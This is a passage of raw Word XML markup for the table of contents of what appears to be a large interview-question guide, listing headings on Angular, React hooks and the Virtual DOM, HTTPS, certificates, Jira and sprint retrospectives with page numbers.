              <w:instrText xml:space="preserve"> PAGEREF _Toc196308345 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1143</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A09FD4F" w14:textId="25CE795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4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angular directives?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308346 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1144</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C479E90" w14:textId="08656ED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4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are observables in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308347 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1145</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="029AAC25" w14:textId="439A0EB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4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implement dependency injection in angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308348 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1146</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02CAB2E7" w14:textId="28DBD80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4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are different components of Angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308349 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1147</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="353E08E2" w14:textId="279DD68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5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handle caching in Angular?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308350 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1149</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27E7A316" w14:textId="0FD87385" w:rsidR="00012799" w:rsidRDefault="00012799">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308351" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>React</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308351 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C683EC8" w14:textId="5C2EDE1A"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5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Features of ReactJS?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308352 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="463D7CE9" w14:textId="0B27DCF3"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5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does Virtual DOM work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308353 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FEDD308" w14:textId="1CF820E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5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Features of Virtual DOM?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308354 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1156</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21C5B253" w14:textId="549D497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5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reducing modifications in Virtual DOM?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308355 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1157</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3856DA84" w14:textId="342EF1E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5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do you call the backend API from ReactJS?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308356 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1159</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7709D4EA" w14:textId="00FB238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5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are other Hooks in React?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308357 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1160</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F3A027A" w14:textId="7CBC7A4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5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purpose of Hook?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308358 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F7DEAB1" w14:textId="17895E95"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5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dependency array in useEffect?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308359 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CA1897B" w14:textId="320B7AC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6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use and significance of dependency arrays?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308360 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1163</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C23ECDA" w14:textId="0512F7A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6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to make a call to an external API from ReactJS?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308361 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1164</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="094257BE" w14:textId="531586FB"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6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an alternative to Axios?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308362 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="512CC0E8" w14:textId="137F6D40" w:rsidR="00012799" w:rsidRDefault="00012799">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308363" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Others</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308363 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1169</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3CF1568E" w14:textId="7A71FDD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6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Jira?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308364 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1169</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11924A00" w14:textId="20F5C0D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6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the output of below program?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308365 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1170</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="342D8F42" w14:textId="16999A6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6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https protocol?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308366 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1171</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52DDA5BA" w14:textId="3816A43F"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6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does https internally work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308367 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1171</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C2BA6BE" w14:textId="5B2CF8D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6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http and https?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308368 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1173</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51A87627" w14:textId="2442708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6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a certificate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308369 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1174</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46C999AC" w14:textId="5FE5CB8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7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a Sprint retrospective?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308370 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
